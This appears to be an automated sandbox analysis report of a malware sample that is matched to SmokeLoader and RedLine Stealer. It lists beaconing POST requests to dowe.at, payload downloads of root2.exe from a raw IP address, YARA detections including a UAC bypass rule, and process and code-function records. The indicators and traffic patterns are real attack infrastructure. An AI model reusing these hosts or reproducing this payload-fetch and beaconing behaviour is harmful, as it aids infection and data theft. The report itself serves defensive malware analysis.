                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lawtvrqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: dowe.at
                Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frwum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifardcruc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbbshbjmpq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkguxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frdxrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plraoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://panajd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://queeh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvqyks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oidcj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljwdjes.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bajxyhac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbxsgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjvagowrnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueuounaic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhxqowscaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqdpmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxslssk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbdses.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvmoh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlixtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bymgj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jviyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://papeicwkil.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csplko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecwfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avfvrfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouqhut.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amjtlofw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrgphm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dowe.at
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
                Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
                Source: unknownDNS traffic detected: queries for: dowe.at
                Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
                Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: dfhwrav, 00000009.00000002.385029493.00000000006EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: Yara matchFile source: Process Memory Space: ADCA.exe PID: 1432, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0088194010_2_00881940
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0089724410_2_00897244
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00885B3410_2_00885B34
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_008770C410_2_008770C4
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_006BA8DC10_2_006BA8DC
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0088962210_2_00889622
